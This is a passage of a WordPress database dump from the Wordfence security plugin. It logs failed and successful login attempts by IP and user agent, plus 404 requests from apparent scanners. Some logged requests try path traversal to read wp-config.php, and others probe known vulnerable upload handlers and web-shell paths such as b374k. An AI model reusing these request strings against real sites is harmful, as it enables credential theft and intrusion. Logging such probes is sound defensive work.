(104179, 1500381660.629932, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978650888, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104180, 1500383300.968534, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1486653111, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104181, 1500383302.008165, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1486653111, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104182, 1500383818.886970, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1459974947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104183, 1500383819.914898, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1459974947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104184, 1500386439.443117, 1, 'loginFailValidUsername', 'admin', 1, 885815617, ''),
(104185, 1500390057.373496, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3680266720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104186, 1500390364.250662, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1378840677, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104187, 1500390365.210237, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1378840677, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104188, 1500391388.192385, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754861785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104189, 1500391389.519409, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754861785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104190, 1500391517.409708, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3577159483, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104191, 1500391520.438470, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3577159483, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104192, 1500394768.994487, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2961775105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104193, 1500394770.362223, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2961775105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104194, 1500395058.246965, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1969622199, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104195, 1500395059.981879, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1969622199, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104196, 1500395995.369561, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1296412301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104197, 1500395996.643198, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1296412301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104198, 1500397437.580254, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1324837478, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104199, 1500397669.289288, 1, 'loginFailValidUsername', 'admin', 1, 911757147, ''),
(104200, 1500401706.940554, 1, 'loginFailValidUsername', 'admin', 1, 17373758, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104201, 1500402316.683915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 457956911, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104202, 1500402318.205792, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 457956911, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104203, 1500402827.799204, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 415233868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104204, 1500402829.032020, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 415233868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104205, 1500405775.686854, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2036543082, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104206, 1500405777.236035, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2036543082, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104207, 1500405942.209733, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3120992176, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104208, 1500405943.413406, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3120992176, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104209, 1500407359.217840, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3014938320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104210, 1500407360.655741, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3014938320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104211, 1500411035.853697, 1, 'loginFailValidUsername', 'admin', 1, 3410419836, ''),
(104212, 1500411654.226908, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1503345003, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104213, 1500411655.252547, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1503345003, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104214, 1500412928.859042, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1832917706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104215, 1500412929.960424, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1832917706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104216, 1500413274.664307, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1424303882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104217, 1500413275.742095, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1424303882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104218, 1500415346.282178, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3269181341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104219, 1500418734.354244, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3001782822, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104220, 1500418736.141359, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3001782822, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104221, 1500422585.264602, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 697295223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104222, 1500422587.944793, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 697295223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104223, 1500423271.361978, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1317212049, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104224, 1500423272.411882, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1317212049, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104225, 1500423790.273988, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3695954925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104226, 1500423792.798434, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3695954925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104227, 1500424839.688633, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/534.18.55 (KHTML, like Gecko) Chrome/57.5.0685.5313 Safari/534.47'),
(104228, 1500425696.684802, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3015536834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104229, 1500425698.227497, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3015536834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104230, 1500433591.009867, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3178793580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104231, 1500433592.515426, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3178793580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104232, 1500435283.026157, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1935868403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104233, 1500435284.654467, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1935868403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104234, 1500435402.303609, 1, 'loginFailValidUsername', 'admin', 1, 247468505, ''),
(104235, 1500437464.039455, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142118403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104236, 1500437465.486477, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142118403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104237, 1500437797.471676, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3359800449, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104238, 1500437798.996222, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3359800449, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104239, 1500438526.813351, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945508724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104240, 1500438528.456123, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945508724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104241, 1500438976.315699, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182036186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104242, 1500438978.133647, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182036186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104243, 1500439416.146613, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2107989375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104244, 1500439419.945215, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2107989375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104245, 1500442432.376336, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2110869389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104246, 1500442435.939973, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2110869389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104247, 1500442794.161257, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1435463714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104248, 1500442795.283239, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1435463714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104249, 1500443638.274911, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 995672607, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104250, 1500443640.054962, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 995672607, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104251, 1500444483.789366, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2637302370, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104252, 1500444485.197091, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2637302370, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104253, 1500444655.195091, 1, 'loginFailValidUsername', 'admin', 1, 3120616689, ''),
(104254, 1500446782.297606, 1, 'loginFailValidUsername', 'admin', 1, 3114828415, ''),
(104255, 1500448349.085174, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3413342434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104256, 1500448350.938286, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3413342434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104257, 1500449303.561961, 1, 'loginFailValidUsername', 'admin', 1, 1368753261, ''),
(104258, 1500449777.374416, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201796910, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(104259, 1500449778.883890, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201796910, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104260, 1500451343.383943, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 973658906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104261, 1500451345.828338, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 973658906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104262, 1500451995.065015, 1, 'loginFailValidUsername', 'admin', 1, 1711219883, ''),
(104263, 1500453376.678293, 1, 'loginFailValidUsername', 'admin', 1, 3351375892, ''),
(104264, 1500464993.732914, 0, 'loginOK', 'admin', 1, 3250520646, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(104265, 1500465005.765043, 0, 'loginOK', 'admin', 1, 3250520646, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(104266, 1500465062.984830, 0, 'loginOK', 'admin', 1, 3250520646, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(104267, 1500465083.137367, 0, 'loginOK', 'admin', 1, 1806133391, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 OPR/45.0.2552.898'),
(104268, 1500465124.121031, 0, 'loginOK', 'admin', 1, 3250520646, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0');

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfNet404s`
--

CREATE TABLE `www2_wfNet404s` (
  `sig` binary(16) NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `URI` varchar(1000) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfNet404s`
--

INSERT INTO `www2_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0x6c27fc60c32252f4f8f2dd040e2caf30, 1466915210, '/wp-content/themes/figero/images/favicon.ico'),
(0xabcc19dba592ed3bad4fb6d9f3151998, 1466921545, '/wp-content/uploads/wpcf7_captcha/508111640.png'),
(0xef8371326febc29eefc703d7c4f35942, 1466924964, '/wp-content/uploads/wpcf7_captcha/553935450.png'),
(0xe83a391d8cb78038421fa26014c78c8f, 1466927442, '/wp-content/plugins/wp-symposium/server/php/index.php'),
(0xf51fe7808e1ada4f7aa3bda04f18b17d, 1466959257, '/.well-known/apple-app-site-association'),
(0xfd1e09fe095dd3e689f68833393fbf5c, 1466959257, '/apple-app-site-association'),
(0x00630e1e9221e9fdf19bddc9fcaa6897, 1466985121, '/.well-known/assetlinks.json'),
(0x86222b93a570c5ee284fb59f44b1f48b, 1467022161, '/wp-content/themes/photocrati-theme-v4.07/style.css'),
(0x3c2f3578edd0a530b486c17268b296b9, 1467027378, '/setup.php'),
(0x1bdab006cccb98477ad41eb26b3478f4, 1467046866, '/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?path=./&action=upload_ad_image'),
(0x0b7b480b9ee42fd8ea55fa25393f8b5d, 1467075861, '/sitemap.xml'),
(0x4115ca5901f30a246446793b43095c7e, 1467081590, '/wp-content/themes/dandelion/style.css'),
(0xcb8354179438508b804d07092fe2855e, 1467096758, '/wp-includes/class.wp-date.php'),
(0xcc95be3e665a25cf8b5a7bc2a929b0b3, 1467133216, '/apple-touch-icon-precomposed.png'),
(0xff273ec96a88f690e3c10ed03f0b3790, 1467133217, '/apple-touch-icon.png'),
(0xb16e49f2afa29176349b03ced0ece0d1, 1467186487, '/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php'),
(0x3b9004fa8a8ed530003eac3fabe4b593, 1467224323, '/wp-content/themes/Dandelion/functions/upload-handler.php'),
(0x667f505d1a07be82502dfb89dcf3e176, 1467232491, '/wp-content/plugins/revslider/temp/update_extract/'),
(0x0dc4f1ce23b653fa8901537c19666cc2, 1467311142, '/wp-content/themes/Dandelion/style.css'),
(0xb912eefb069fe1a81f159c9d79198ab3, 1467319104, '/wp-content/b374k-2.8.php'),
(0x04666fbd6b8c8f0d2b02882e7adf340d, 1467358575, '/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php'),
(0x909548c9cc82e20ddc896a380d229c86, 1467470240, '/wp-content/themes/twentyfifteen/404.php'),
(0x444ee2b4c84160aaa5c68776562d7c50, 1467505260, '/comments/feed/'),
(0x49dca947efbccdf6020e7927406d3406, 1467620405, '/wp-content/themes/twentyten/404.php'),
(0xf48858e50e98879b1197ba7661c1f4ce, 1467657325, '/sites/all/libraries/elfinder/connectors/php/connector.php'),
(0x12089bf26d91768c7d5ad4f44b19bd5d, 1467661498, '/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php'),
(0xe25dbd8a55559461ba0dc4ebe74b86b1, 1467673619, '/wp-checking.php'),
(0xa09d4b3e92bff859738dd3159f29be4d, 1467673619, '/wp-check.php'),
(0xc029828cd72926db2913dff29f54abef, 1467674785, '/wp-content/themes/figero/js/\\\'+url+\\\''),
(0xa7ceb703d70f80ae0986c321ac658b05, 1467740688, '/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'),
(0x613d31d50e4c0e8802e524b7ac68a067, 1467744694, '/wp-content/plugins/gallery-plugin/upload/php.php'),
(0x97e8d5cfbae6f2f47cc232f59c936c10, 1467746454, '/wp-content/themes/dimension/style.css'),
(0xabe0b00eb823129b747d1e84c898a76a, 1467822195, '/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/js/main.js'),
(0xbd524b3ea9638c1d8415b6739c7e240c, 1467862332, '/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php'),
(0x93dbf03e955d8eb9763f00993ce4b747, 1467910024, '/uploadify/uploadify.css'),
(0x8f5958020dc124310661a66a89a52bd4, 1467928909, '/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php'),
(0xe37ea32533b576f19fe0d52770d5f3fa, 1467965826, '/wp-content/uploads/wpcf7_captcha/2038006399.png'),
(0x2f8bc11a9a8ac565c4593868ccd773cc, 1467973145, '/wp-content/uploads/wpcf7_captcha/72019733.png'),
(0xd294bf5286da4a6184c4fbb587fae349, 1467977478, '/uploadify/uploadify.php'),
(0xa753f175a51c5c6a18b0a9bd6109a4fe, 1467999276, '/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/js/main.js'),
(0x02032c4b4b464564aea47bfa0851337b, 1468035369, '/wp-content/themes/anthology/functions/upload-handler.php'),
(0x331524f574faefa22b838833aa5ac4da, 1468047550, '/apple-touch-icon-120x120-precomposed.png'),
(0xc55ef3c565a5f8a5abc9425fde5a0f51, 1468047551, '/apple-touch-icon-120x120.png'),
(0x2c1f09e2d8d7ff3cffa8d0f9b11d4eee, 1468057604, '/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php'),
(0x361e27e46919994e45155c0445101435, 1468087417, '/wp-content/themes/corporate/404.php'),
(0x5204507a6e25c4aee83a571d47a43292, 1468140727, '/wp-content/themes/qualifire/style.css'),
(0x01c66ab8dddf43294dcce65fbb1223eb, 1468149144, '/wp-content/plugins/foxypress/uploadify/uploadify.php'),
(0x9d22b61243866f8447a017475fbbf058, 1468160292, '/wp-content/uploads/wpcf7_captcha/2033726340.png'),
(0x947a2146aa8f55279b5c389be692fbce, 1468243981, '/wp-content/themes/license.php'),
(0x28be95902b2979fd09f6f7454e3f15a1, 1468259168, '/wp-content/themes/kernel-theme/functions/upload-handler.php'),
(0x2409fc33f776b0d7e509eb95f5ea314d, 1468326334, '/wp-content/plugins/mailpress/readme.txt'),
(0x7bb784586f6771430614c498db1fd020, 1468327421, '/wp-content/themes/famous/style.css'),
(0x7957667ebbc7a27c2bf2ab412fd115a0, 1468333402, '/wp-content/plugins/work-the-flow-file-upload/public/assets/js/public.js'),
(0x9fe400c2f864dea91286271684d9644f, 1468364879, '/wp-content/plugins/front-file-manager/lib/plupload/js/plupload.js'),
(0xae38c4da99a44d234b70477a202f4889, 1468400992, '/wp-content/plugins/wp-mobile-detector/cache/css.php'),
(0x165b403014e723cba340a353d012d246, 1468407183, '/wp-content/uploads/wpcf7_captcha/306896323.png'),
(0xb08b6073fa1748efc43545e72cc421e6, 1468409761, '/wp-content/themes/twentyeleven/download.php?filename=../../../../../wp-config.php'),
(0x02a28d3ae319764e3c470c09e86a6110, 1468419234, '/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php'),
(0x139137b2f820abb7231ddafefa99145e, 1468439238, '/wp-admin/user/system.php'),
(0x3880fe7661d828e6b6971651a6197868, 1468439239, '/wp-content/themes/profoblog20/functions/jquery-ui/thumbs.php'),
(0xfbc805c68cd5cda2e47a1910e5de052f, 1468439239, '/wp-content/themes/profoblog20/js/helpers/thumbs.php'),
(0xfa4f4c2b918f9ec349cb16cadefccf17, 1468439239, '/wp-content/themes/twentyfourteen/genericons/font/thumbs.php'),
(0x1c58674e6ef55abd370f3db4ec261d51, 1468439239, '/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/thumbs.php'),
(0x4dc3b8acb5feaaa934affb308b4ee8ba, 1468439239, '/wp-content/languages/themes/sys.php'),
(0xdf3abeffea236ba86dfeaeff33d845ad, 1468439239, '/wp-content/themes/profoblog20/functions/colorpicker/thumbs.php'),
(0x6a1f2868a4570a28d18a5a5421684f73, 1468439239, '/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/ini.php'),
(0x2f330d6df49072ad01a160faf1667551, 1468439239, '/wp-includes/js/jcrop/sys.php'),
(0x3bb91fd8c56d6d449a9e91ffb489b21f, 1468439239, '/wp-includes/js/crop/sys.php'),
(0x30293319a05e308a87f0f0aedbd5fc93, 1468439280, '/wp-includes/js/system.php'),
(0x9a8a03af7eb47130a0f0a070b91e4440, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ini.php'),
(0xcf75c04d6e64621a84b00a2bda11f57b, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/thumbs.php'),
(0xeb5b8c0e9fed5854037f831fd84626b6, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ini.php'),
(0x4a3fa8e0d8dce242cae992c34ce3701f, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ini.php'),
(0x172514974dc6308afb9d31eb7adbc5f5, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/thumbs.php'),
(0xf2e7c67c6b9d8241778589909a1510bd, 1468439280, '/wp-includes/js/tinymce/themes/advanced/thumbs.php'),
(0xc6e13a228057d9114cd67a860e8f201a, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/o2k7/thumbs.php'),
(0xc99b4d055df667b8441daeb161a33caa, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/default/ini.php'),
(0xe935586cf5b54f35540711b2102980c9, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/default/thumbs.php'),
(0x309a1072bc56a33a6eb11144db8e9c2e, 1468441531, '/assets/js/uploadify/uploadify.php'),
(0x4136639491a3000aa4ae4442e3a94d99, 1468447608, '/wp-content/plugins/front-end-upload/lib/plupload/js/plupload.js'),
(0xe21ffa883cdf96f0f7745b749189346b, 1468448808, '/sql.php?n703018'),
(0x87da02982c8e53ce5172546628c91d09, 1468448808, '/session.php?n79c1ec'),
(0x560128ee4e2dc48ef1e75ea266923e31, 1468448808, '/functions.php?q78cd5a'),
(0xd2269f4599faab08710ea4206d38bfe9, 1468448808, '/utf.php?qe91e7a'),
(0x92c303ee682804dfd7cb277b01bd70ad, 1468448808, '/blog.php?n7f69dd'),
(0x340150727369376fd36ae2e3daf78e0c, 1468448808, '/option.php?ncdd94a'),
(0x3a569cb523d8e272d47ee529ea8faef4, 1468448808, '/files.php?n23f412'),
(0x9fba6e9cc3abc6e19514037b2bc0e930, 1468448809, '/view.php?qbc8a20'),
(0x9b30ed5a8e47ac05661550482e2180c9, 1468448809, '/diff.php?qf76775'),
(0xb336ef911b7f5c8a6f16cc2384c89af4, 1468448809, '/code.php?nd6e706'),
(0x0e4a675ddf2df28b3c856928d7ad9637, 1468448809, '/article.php?n0e7f9c'),
(0xe321cdc3d068437c7415c8a18fe51377, 1468448809, '/db.php?q95e668'),
(0x8a7a724106a786e77ffc8803854e2bd9, 1468448809, '/title.php?q6fc9cb'),
(0x91791dee426ef1c9244be47c0b23c885, 1468448809, '/ajax.php?nf03c87'),
(0x16cebaa8a05cc6851633eecd2c82e1c7, 1468448810, '/inc.php?q318a65'),
(0x4fe0e86af616e9eb49ad35f0dc7c9700, 1468448811, '/model.php?q726b60'),
(0xb59cdf1d72125862c3746b5d9e05914e, 1468448811, '/header.php?q1c1ae6'),
(0x924a83a149fd297bde90f2b262bf57fa, 1468448811, '/xml.php?q3729f7'),
(0xfe4494f62cf2a9ba2c60bdc16d18a7ba, 1468448811, '/footer.php?q44390c'),
(0x8c251a6562355f305bc9a9c0cc5a565b, 1468448811, '/option.php?qcdd94a'),
(0x48598114bb633c10b8d911c323556f0a, 1468448812, '/press.php?q33beb2'),
